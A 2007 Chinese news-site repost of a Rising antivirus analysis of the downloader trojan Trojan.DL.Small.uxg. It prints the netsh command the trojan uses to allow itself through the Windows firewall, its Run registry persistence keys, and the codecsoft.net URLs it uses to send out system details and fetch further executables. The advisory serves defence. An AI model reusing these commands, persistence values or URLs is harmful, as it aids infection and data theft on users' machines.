| 网站首页 | 新闻快报 | 软件教程 | 硬件教程 | 设计学院 | Q Q 专区 | 编程开发 | 网络安全 | 
您现在的位置: 浩扬网络 >> 新闻快报 >> 病毒快讯 >> 瑞星快讯 >> 新闻正文
瑞星最新病毒分析报告:Trojan.DL.Small.uxg
作者:佚名 文章来源:瑞星公司 点击数: 更新时间:2007-4-24 17:14:02


    该病毒调用命令"netsh firewall set allowedprogram '病毒程序文件全名' enable",通过windows的防火墙,复制自己为%system%\kernels32.exe,并添加以下注册表键值来达到自动运行:HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Currentversion\Run "System" = %SYSTEM%\KERNELS32.EXE

    发送http请求,将宿主系统的语言、处理器、系统版本等信息发出:http://codecsoft.net/adv/086/adload.php?a1=People's Republic of China&a2=Type of Processor: PENTIUM PRO or ENTIUM II/III&a3=Windows version is 5.0&a4=Build: 2195, Platform ID: 2&a5=notoutpost&table=adv86

    启动多个线程并尝试下载以下等文件:

http://codecsoft.net/pic/search.jpg
http://codecsoft.net/pic/search.jpg
http://codecsoft.net/pic/tibs.jpg
http://codecsoft.net/pic/proxy.jpg
http://codecsoft.net/pic/winlogon.jpg

    用以下等地址下载exe、dll等文件:

http://codecsoft.net/ew4t54th3t456wt34567.php?adv=86&code1=IN0H&code1=2160
http://codecsoft.net/34gfrfdsfghgretytrer5t65rerfgjh/adv86.php?adv=86&code1=IN0H&code2=2160&code3=


    下载的文件保存为%SYSTEM%\dlh9jkd1q1.exe、%SYSTEM%\dlh9jkd1q2.exe、%SYSTEM%\1.dllb、%SYSTEM%\2.dllb等。启动下载的exe文件,并在HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Currentversion\Run下为每个建立键值以便自动运行。


【新闻录入:笑珠儿    责任编辑:笑珠儿 】
发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口
网友评论:(评论内容只代表网友观点,与浩扬网络立场无关!)
热门文章

赞助商


| 设为首页 | 加入收藏 | 联系站长 | 友情链接 | 版权申明 | 网站公告 |